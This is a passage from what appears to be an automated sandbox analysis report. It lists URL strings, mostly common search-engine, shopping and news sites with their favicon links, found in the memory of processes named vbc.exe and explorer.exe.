Source: vbc.exe, vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2158990238.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2153195546.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
